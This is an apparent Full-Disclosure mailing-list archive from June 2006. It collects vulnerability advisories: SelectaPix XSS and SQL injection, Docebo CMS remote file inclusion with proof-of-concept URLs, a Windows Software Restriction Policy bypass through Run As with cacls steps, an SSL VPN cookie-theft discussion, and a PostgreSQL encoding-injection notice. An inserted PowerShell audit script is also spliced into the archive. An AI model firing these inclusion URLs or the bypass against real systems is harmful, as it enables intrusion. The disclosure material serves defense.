2) Input passed to the "albumID" parameter in "popup.php" and 
"view_album.php" is not properly sanitised before being returned to 
the user. This can be exploited to execute arbitrary HTML and script 
code in a user's browser session in context of an affected site.

The vulnerabilities have been confirmed in version 1.31. Prior 
versions may also be affected.

==
5) Solution

Update to version 1.4.
http://www.outofthetrees.co.uk/selectapix/index.php

==
6) Time Table

17/05/2006 - Initial vendor notification.
31/05/2006 - Vendor confirms vulnerabilities.
09/06/2006 - Public disclosure.

==
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-2912 (SQL injection) and CVE-2006-2913 (cross-site scripting)
for the vulnerabilities.

==
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-39/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] Re: SSL VPNs and security

2006-06-09 Thread E Mintz

I agree on your point that the technology requires PROPER design.

Vendors who miss the basics should lose their right to play the game.

On 6/9/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:

On Fri, 9 Jun 2006, E Mintz wrote:

> How about some real-world, application specific exploits?

There's an example of a XSS that can be used to compromise Cisco Web VPN
session in the text.

> So, please show me an example of an actual compromise and I'll listen.
> Otherwise, put up, or shut up!

You're not strictly required to listen, you know ;)

/mz





[Full-disclosure] Re: SSL VPNs and security

2006-06-09 Thread E Mintz

How about some real-world, application specific exploits?

SSL VPN is hardly a 'novelty' or 'recent' technology. I implemented my
first SSL VPN in '99 at a large financial, and it is still in
production, and secure

So, please show me an example of an actual compromise and I'll listen.
Otherwise, put up, or shut up!

-Erik





On 6/8/06, Michal Zalewski < [EMAIL PROTECTED] > wrote:
> "Web VPN" or "SSL VPN" is a term used to denote methods for accessing
> company's internal applications with a bare WWW browser, with the use of
> browser-based SSO authentication and SSL tunneling. As opposed to IPSec,
> no additional software or configuration is required, and hence, corporate
> users can use pretty much any computer they can put their hands on.
>   [ Yes, this is a very bad idea, but often also a perceived business
> necessity. To counter the risk, some SSL VPN solutions may perform
> client-side security checks with the aid of an applet or control "not
> marked as safe". This is, of course, a silly and bypassable design,
> and has a side effect of teaching the user to click "yes" on
> scripting safety prompts. But I digress... ]
>
>   [ These solutions are sold, among others, by Juniper, Nortel, Nokia,
> Cisco. The following observations are based on Cisco Web VPN (and your
> mileage with this and other vendors may vary).
>
> In their most basic operating mode, SSL VPN systems simply act as a HTTPS
> authentication and authorization proxy that relies on session cookies, and
> a URI-based request rewriting and forwarding engine. Such a configuration
> enables the user to access any HTTP or HTTPS based Intranet applications;
> web-based clients for some other protocols are also sometimes included.
>
>   [ With the help of various controls and applets again "not marked as
> safe", SSL VPNs can also forward local TCP ports through that tunnel,
> if unsupported network protocols need to be used. ]
>
> A good example: let's say there's a user who wishes to access his
> corporate Outlook Web Access interface from a remote location. The usual
> URL for the intranet service is:
>
>   http://owa/exchange/lcamtuf/inbox
>
> To access it over the Internet, that fellow needs to navigate to
>  https://webvpn.foocorp.com/, enter his credentials, collect a session
> cookie, and then go to (or be redirected to) something along the lines of:
>
> https://webvpn.foocorp.com/http/0/owa/exchange/lcamtuf/inbox
>
> ...which, if the cookie validates, would be translated to the original URL
> and allowed to go through, with SSL VPN acting as a proxy.
>
> Commercial SSL VPNs are a fairly recent technology that has a considerable
> appeal to various corporations. Because of its novelty, however, in a
> typical setup it may be subject to several serious security flaws, unless
> very carefully designed.
>
> Possibly the most important problem is that web VPNs break the customary
> browser security model that relies on domain name separation for the
> purpose of restricting access to cookies and other objects. Browsers
> generally allow " foo.com" to interact with own cookies or windows, but
> prevent the site from accessing resources related to "bar.com". Yet
> through SSL VPN, they all may look the same:
>
>https://webvpn.foocorp.com/http/0/foo.com/serious_work
>   https://webvpn.foocorp.com/http/0/bar.com/fun_and_games
>
> Because of this design, all pages displayed through a Web VPN interface
> are lumped together. Whenever a page (or just a HTML fragment) that can be
> controlled by the attacker is displayed by *any* of the applications
> behind Web VPN, Javascript can access:
>
>   - Web VPN session cookie, which can be then passed to the attacker.
> This is equivalent to the attacker obtaining access to all protected
> systems and compromising Web VPN altogether. The threat could be
> mitigated by associating the cookie with client's IP, but such an
> approach is not always implemented, and is impractical with AOL and
> the likes.
>
>   - Application cookies set by other applications. If passed to the
> browser (as some SSL VPNs do), these cookies are separated by the use
> of "path" parameter alone, which does not necessarily establish a
> browser security domain boundary. This is equivalent to the attacker
> obtaining user credentials to these applications.
>
>  Some commonly used corporate applications may indeed serve
> attacker-supplied contents, making these attacks virtually inherent to
> most SSL VPN deployments:
>
>   - Various web mail systems, such as Outlook Web Access (OWA),
> may serve HTML attachments and other documents received from the
> Internet without providing an adequate browser warning. Although
> this is a security challenge by itself for all web mail interfaces
>   (where there is a risk of stealing web mail session cookie),
> the access to all SSL VPN cookies make the impact far more serious.
>
>   - Tr

[Full-disclosure] Docebo CMS 3.0.3, Remote command execution

2006-06-09 Thread Federico Fazzi
-
Advisory id: FSA:007

Author:Federico Fazzi
Date:  09/06/2006, 6:10
Synthesis: Docebo CMS 3.0.3, Remote command execution
Type:  high
Product:   http://www.docebolms.org/
Patch: unavailable
-


1) Description:

Error occurred in news_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in content_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in util.media.php,

include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");

Users can include a remote file because
$GLOBALS['where_framework'] and $GLOBALS['where_cms']
aren't sanitized.

2) Proof of concept:

http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

3) Solution:

Include the file where $GLOBALS[*] is declared.



[Full-disclosure] Windows Software Restriction Policy Protection Bypass

2006-06-09 Thread 3APA3A
Dear bugtraq@securityfocus.com,

  It was reported anonymously with request to post to lists.

Windows Software Restriction Policy Protection Bypass

Author:  Anonymous
Class:   Restrictions bypass
Vector:  Local
Vendor:  Microsoft
Software: Windows XP SP2, Windows Server 2003 SP1
Risk level:  Low

Remark:

I don't know whether this is a bug or a feature, but I can't find any
documentation on this issue.

Description:

Software Restriction Policy restrictions don't apply if the user logs on
via the Secondary Logon service (Run As).

Test:

Create a new SRP policy (in a Local or Domain Level GPO, for User or for
Computer). Change security levels to Disallowed. Update the policy and log on
as a restricted user. Copy notepad to the desktop. Try to launch notepad
from the desktop (it will fail). Right-click on notepad, choose Run As, select
"Following users", and type the current user name and password. You'll see
notepad launched. The CLI version (runas.exe) gives similar results.

Remark. 

Why are ACLs not a workaround?
If a user has the ability to write (create files) in any folder (for example,
the profile, Temporary Internet Files, whatever), he (or she, of course)
becomes the owner of the created files. And even if we revoke the NTFS
execute permission on any writable folder, the user can change permissions
on the files, because he (or she, of course) is the creator/owner of said file.

Example (user 'test' is not an administrator):

cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE

  BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER

  BUILTIN\Administrators:F
  NT AUTHORITY\SYSTEM:F
  WINXP01\test:F
  BUILTIN\Users:R

C:\noexec>notepad.exe
Access denided.

C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F

C:\noexec>notepad.exe

Workaround:

Disable Secondary Logon service:

sc stop seclogon
sc config seclogon start= disabled

Timeline:

05.06 - Vulnerability discovered
08.06.06 - Vendor notification
09.06.06 - Vendor response

"Software Restriction Policy and Group Policy are not meant to be
complete security features...For full security, we recommend using ACLs
to protect the appropriate resources in your environment..."

09.06.06 - Public disclosure
  

-- 
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
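The following audit script is an added example and is not part of the report above, nor Microsoft tooling. It checks a host for the condition the report describes (a restrictive SRP default level combined with a running Secondary Logon service) and, with -Fix, applies the same workaround the report gives (stop seclogon and set its start type to Disabled). Assumptions: PowerShell 3.0 or later (for Get-CimInstance); SRP state is read from the Safer policy key under HKLM (computer policy) and HKCU (user policy), where DefaultLevel carries the SAFER_LEVELID value; -Fix must be run elevated.

```powershell
<#
  Added example (not from the original report or from Microsoft):
  audit a host for the Secondary Logon (Run As) SRP bypass condition.

  Assumptions:
    - PowerShell 3.0+ (Get-CimInstance).
    - SRP default level is read from the Safer\CodeIdentifiers policy key
      (HKLM = computer policy, HKCU = user policy). DefaultLevel holds the
      SAFER_LEVELID value: 0 Disallowed, 0x1000 Untrusted, 0x10000 Restricted,
      0x20000 Basic User, 0x40000 Unrestricted.
    - -Fix needs administrator rights (changes a service start type).
#>
param([switch]$Fix)

$levelNames = @{
    0       = 'Disallowed'
    0x1000  = 'Untrusted'
    0x10000 = 'Restricted'
    0x20000 = 'Basic User'
    0x40000 = 'Unrestricted'
}

# Return one object per scope (HKLM/HKCU) where an SRP default level is set.
function Get-SrpDefaultLevel {
    foreach ($hive in 'HKLM', 'HKCU') {
        $key  = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers"
        $item = Get-ItemProperty -Path $key -Name DefaultLevel -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            $name = $levelNames[[int]$item.DefaultLevel]
            if (-not $name) { $name = ('0x{0:X}' -f [int]$item.DefaultLevel) }
            [pscustomobject]@{ Scope = $hive; DefaultLevel = $name }
        }
    }
}

# Current state and start mode of the Secondary Logon service.
function Get-SecLogonState {
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='seclogon'"
    if ($null -eq $svc) { return $null }
    [pscustomobject]@{ State = $svc.State; StartMode = $svc.StartMode }
}

$srp = @(Get-SrpDefaultLevel)
if ($srp.Count -eq 0) {
    Write-Output 'No Software Restriction Policy default level is configured on this host.'
} else {
    $srp | Format-Table -AutoSize | Out-String | Write-Output
}

$seclogon = Get-SecLogonState
if ($null -eq $seclogon) {
    Write-Output 'Secondary Logon service (seclogon) is not installed.'
    return
}
Write-Output ('seclogon: State={0} StartMode={1}' -f $seclogon.State, $seclogon.StartMode)

# SRP only matters for the bypass when it is actually restricting something.
$restricted = $srp | Where-Object { $_.DefaultLevel -ne 'Unrestricted' }
if ($restricted -and $seclogon.StartMode -ne 'Disabled') {
    Write-Warning ('SRP enforces a restrictive default level but seclogon is not disabled: ' +
                   'Run As can still start executables the policy blocks.')
    if ($Fix) {
        # Equivalent to the report's workaround:
        #   sc stop seclogon
        #   sc config seclogon start= disabled
        Stop-Service -Name seclogon -Force -ErrorAction SilentlyContinue
        Set-Service  -Name seclogon -StartupType Disabled
        Write-Output 'seclogon stopped and start type set to Disabled.'
    }
} else {
    Write-Output 'No action needed.'
}
```

Run it without -Fix first to see the finding, then with -Fix from an elevated prompt to apply the workaround; the check deliberately treats any level other than Unrestricted as "restrictive", since the bypass is relevant whenever SRP is blocking anything at all.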


[Full-disclosure] [USN-288-2] PostgreSQL server/client vulnerabilities

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-288-2  June 09, 2006
postgresql-8.1 vulnerabilities
CVE-2006-2313, CVE-2006-2314
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libpq-dev  8.1.4-0ubuntu1
  libpq4 8.1.4-0ubuntu1
  postgresql-8.1 8.1.4-0ubuntu1
  postgresql-client-8.1  8.1.4-0ubuntu1
  postgresql-contrib-8.1 8.1.4-0ubuntu1

After a standard system upgrade you need to restart all services that
use PostgreSQL to effect the necessary changes. If you can afford it,
rebooting the computer is the easiest way of ensuring that all running
services use the updated client library.

Details follow:

USN-288-1 fixed two vulnerabilities in Ubuntu 5.04 and Ubuntu 5.10.
This update fixes the same vulnerabilities for Ubuntu 6.06 LTS.

For reference, these are the details of the original USN:

  CVE-2006-2313:
Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of
invalidly-encoded multibyte text data. If a client application
processed untrusted input without respecting its encoding and applied
standard string escaping techniques (such as replacing a single quote
>>'<< with >>\'<< or >>''<<), the PostgreSQL server could interpret the
resulting string in a way that allowed an attacker to inject arbitrary
SQL commands into the resulting SQL query. The PostgreSQL server has
been modified to reject such invalidly encoded strings now, which
completely fixes the problem for some 'safe' multibyte encodings like
UTF-8.
  
  CVE-2006-2314:
However, there are some less popular and client-only multibyte
encodings (such as SJIS, BIG5, GBK, GB18030, and UHC) which contain
valid multibyte characters that end with the byte 0x5c, which is the
representation of the backslash character >>\<< in ASCII. Many client
libraries and applications use the non-standard, but popular way of
escaping the >>'<< character by replacing all occurrences of it with
>>\'<<. If a client application uses one of the affected encodings and
does not interpret multibyte characters, and an attacker supplies a
specially crafted byte sequence as an input string parameter, this
escaping method would then produce a validly-encoded character and
an excess >>'<< character which would end the string. All subsequent
characters would then be interpreted as SQL code, so the attacker
could execute arbitrary SQL commands.
  
To fix this vulnerability end-to-end, client-side applications must
be fixed to properly interpret multibyte encodings and use >>''<<
instead of >>\'<<. However, as a precautionary measure, the sequence
>>\'<< is now regarded as invalid when one of the affected client
encodings is in use. If you depend on the previous behaviour, you
can restore it by setting 'backslash_quote = on' in postgresql.conf.
However, please be aware that this could render you vulnerable
again.
  
This issue does not affect you if you only use single-byte (like
SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like
UTF-8) encodings.
  
  Please see http://www.postgresql.org/docs/techdocs.50 for further
  details.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4-0ubuntu1.diff.gz
  Size/MD5:23774 50475bf9e83adaa54956b32fbeedbdca

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4-0ubuntu1.dsc
  Size/MD5:  e1b77d64f44d3293f650b126ff624565

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4.orig.tar.gz
  Size/MD5: 11312643 c6554a0ef948ab2b18b617954e1788fe

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.4-0ubuntu1_all.deb
  Size/MD5:  1440630 81de1288298a0b1540b995db84d639db

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.4-0ubuntu1_amd64.deb
  Size/MD5:   151534 1a2d7dbbb8be5b9c8a5839a9602ca654

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.4-0ubuntu1_amd64.deb
  Size/MD5:   343524 06e9895e5575d0abdc2d90c504d0f60c

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.4-0ubuntu1_amd64.deb
  Size/MD5:   172050 6d8c0db031695b43daedf1ba0ccf1db4

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.4-0ubuntu1_amd64.deb
  Size/MD5:   173882 4df3a6